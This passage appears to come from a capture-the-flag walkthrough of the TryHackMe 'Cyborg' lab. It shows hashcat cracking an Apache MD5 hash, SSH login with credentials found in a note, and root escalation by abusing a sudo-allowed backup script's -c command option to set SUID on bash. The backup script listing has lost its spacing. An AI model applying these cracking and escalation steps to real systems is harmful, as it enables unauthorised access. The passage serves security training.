Before we crack the hash let's save the hash in a hash.txt file and take a look at the hash-mode for MD5(APR).
Now we can use hashcat to crack the hash.
$ hashcat -a 0 -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz, 1587/3239 MB (512 MB allocatable), 3MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Sun Nov 12 15:16:11 2023 (3 secs)
Time.Estimated...: Sun Nov 12 15:16:14 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12073 H/s (144115188076.33ms) @ Accel:256 Loops:15 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39168/14344385 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38400/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:990-1000
Candidate.Engine.: Device Generator
Candidates.#1....: jonah1 -> lynnlynn
Hardware.Mon.#1..: Util: 68%
Started: Sun Nov 12 15:15:28 2023
Stopped: Sun Nov 12 15:16:16 2023
Now we know both the username and the password.
We are all set to extract the Alex's filesystem. We can use the borg utility to do this.
$ borg extract /home/kunal/tryhackme/cyborg/home/field/dev/final_archive::music_archive
Enter passphrase for key /home/kunal/tryhackme/cyborg/home/field/dev/final_archive:
If we then go to the home/alex/Documents directory, we see a note.txt file.
Let's cat out the file.
$ cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
Let's try to ssh into the machine using the above credentials.
$ ssh alex@10.10.228.18
The authenticity of host '10.10.228.18 (10.10.228.18)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.228.18' (ED25519) to the list of known hosts.
alex@10.10.228.18's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$
We have successfully logged on to Alex's machine.
Let's look around to see what we can find.
$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
The user.txt file seems interesting. Let's check it's contents.
In order to find the root flag we need to become the root user.
Using the sudo -l command we can see what sudo permissions the alex user has.
$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We can see the /etc/mp3backups/backup.sh script can be executed by any user, including us.
backup.sh
#!/bin/bashsudofind/-name"*.mp3"|sudotee/etc/mp3backups/backed_up_files.txtinput="/etc/mp3backups/backed_up_files.txt"#while IFS= read -r line#do#a="/etc/mp3backups/backed_up_files.txt"# b=$(basename $input)#echo# echo "$line"#done < "$input"whilegetoptsc:flagdocase"${flag}"inc) command=${OPTARG};;esacdonebackup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.dest="/etc/mp3backups/"# Create archive filename.hostname=$(hostname-s)archive_file="$hostname-scheduled.tgz"# Print start status message.echo"Backing up $backup_files to $dest/$archive_file"echo# Backup the files using tar.tarczf $dest/$archive_file $backup_files# Print end status message.echoecho"Backup finished"cmd=$($command)echo $cmd
Looking inside the while look, we can see that the program takes in user command identified by -c, and executes it.
Using this knowledge, we can set the suid bit on the /bin/bash file.
